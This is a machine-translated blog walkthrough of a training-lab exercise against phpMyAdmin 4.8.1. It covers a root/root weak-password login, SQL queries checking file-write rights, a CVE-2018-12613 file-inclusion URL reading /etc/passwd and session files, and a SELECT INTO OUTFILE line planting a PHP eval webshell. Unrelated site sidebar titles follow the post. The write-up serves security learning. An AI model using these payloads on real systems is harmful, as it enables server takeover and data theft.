当前位置:网站首页>Moher college phpMyAdmin background file contains analysis traceability
Moher college phpMyAdmin background file contains analysis traceability
2022-07-04 07:44:00 【Lyswbb】
First, get the title and click to visit
Log in with a weak password after access , If login fails, open the privacy mode or change the browser
Account password :root root
Click on sql modular Yes sql Statement to make a query
First query sql Permission to write a sentence
We can see that its value is empty
secure-file-priv Parameters are used to limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() To which specified directory .
show global VARIABLES like '%secure%'
Keep looking at mysql The absolute path of the installation , It can be found that it is installed in /var/lib/mysql/
show VARIABLES like 'datadir'
Next, make sure mysql jurisdiction , You can see that here is the highest authority root
SELECT USER();
After you have the permission and absolute path, you can write a sentence directly , Try it first phpinfo
select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';
When it is written in, the access fails , After thinking for a long time, I found that this is mysql The path of , Not the absolute path of the website
Continue to find ways to get the absolute path of the website According to the title, we can write a phpinfo, Through the absolute path of leakage shell, Ideas have , Direct drying
First, determine the database version , The version is 4.8.1. The number contained in the file is CVE-2018-12613
Direct use of payload Just include it
http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
First write a phpinfo Enter database
select '<?php phpinfo();?>';
Then call through File Inclusion phpinfo
First of all get session Value , In the construction parameters to access phpinfo, Get absolute path
http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]
With an absolute path, you can write webshell 了 , Access directly after writing 1.php
select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";
Use the management tool to log in and go directly to the root key.txt perhaps find / -name key.txt
边栏推荐
- Practice (9-12 Lectures)
- Literature collation and thesis reading methods
- Application of isnull in database query
- How to write a summary of the work to promote the implementation of OKR?
- Blue Bridge Cup Quick sort (code completion)
- L1-026 I love gplt (5 points)
- Write a thread pool by hand, and take you to learn the implementation principle of ThreadPoolExecutor thread pool
- 【Go基础】1 - Go Go Go
- This article is enough for learning advanced mysql
- 【性能测试】一文读懂Jmeter
猜你喜欢
Do you know about autorl in intensive learning? A summary of articles written by more than ten scholars including Oxford University and Google
Easy to understand: understand the time series database incluxdb
Zephyr 学习笔记1,threads
User login function: simple but difficult
Guoguo took you to write a linked list, and the primary school students said it was good after reading it
Practice (9-12 Lectures)
Detailed introduction to the big changes of Xcode 14
The IP bound to the socket is inaddr_ The meaning of any htonl (inaddr_any) (0.0.0.0 all addresses, uncertain addresses, arbitrary addresses)
【性能測試】一文讀懂Jmeter
Zephyr Learning note 2, Scheduling
随机推荐
How to write a summary of the work to promote the implementation of OKR?
Comparison between applet framework and platform compilation
NPM run build error
Easy to understand: understand the time series database incluxdb
谷歌官方回应:我们没有放弃TensorFlow,未来与JAX并肩发展
2022-021ARTS:下半年開始
Preliminary study on temporal database incluxdb 2.2
[untitled] notice on holding "2022 traditional fermented food and modern brewing technology"
2022-021rts: from the second half of the year
zabbix监控系统部署
神经网络入门(下)
L1-027 rental (20 points)
Introduction to neural network (Part 2)
时序数据库 InfluxDB 2.2 初探
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Heap concept in JVM
【Go基础】1 - Go Go Go
[test de performance] lire jmeter
Zephyr study notes 2, scheduling
[gurobi] establishment of simple model